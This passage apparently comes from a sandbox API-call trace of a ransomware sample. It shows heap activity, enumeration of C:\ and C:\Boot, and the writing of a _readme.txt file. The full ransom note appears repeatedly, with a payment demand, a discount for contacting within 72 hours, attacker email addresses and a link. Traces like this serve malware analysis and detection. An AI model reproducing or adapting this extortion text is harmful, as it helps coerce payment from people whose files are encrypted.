(HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e28 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7dd8 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7978 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42580 | out: hHeap=0x2c0000) returned 1 [0183.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0183.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e00 | out: hHeap=0x2c0000) returned 1 [0183.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0183.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0183.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0183.174] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8185b60, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0xa81abcc0, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xa81abcc0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0183.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e00 [0183.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0183.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e00 | out: hHeap=0x2c0000) returned 1 [0183.175] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0183.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e00 [0183.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0183.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e00 | out: hHeap=0x2c0000) returned 1 [0183.176] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa4dfd990, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0xa4dfd990, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0183.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e00 [0183.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0183.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e00 | out: hHeap=0x2c0000) returned 1 [0183.177] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xe51cee90, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0xe51cee90, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe51f4ff0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0183.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e00 [0183.177] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0183.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e00 | out: hHeap=0x2c0000) returned 1 [0183.177] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xe51cee90, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0xe51cee90, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe51f4ff0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0183.177] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.178] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0183.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.189] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e00 [0183.189] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0183.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0183.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0183.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.192] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0183.192] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.192] PathFindFileNameW (pszPath="") returned="" [0183.192] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.193] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.193] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.193] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.193] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0183.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.194] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0183.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.194] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.194] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.194] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0183.196] FindFirstFileW (in: lpFileName="C:\\Boot\\*" (normalized: "c:\\boot\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0183.196] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", 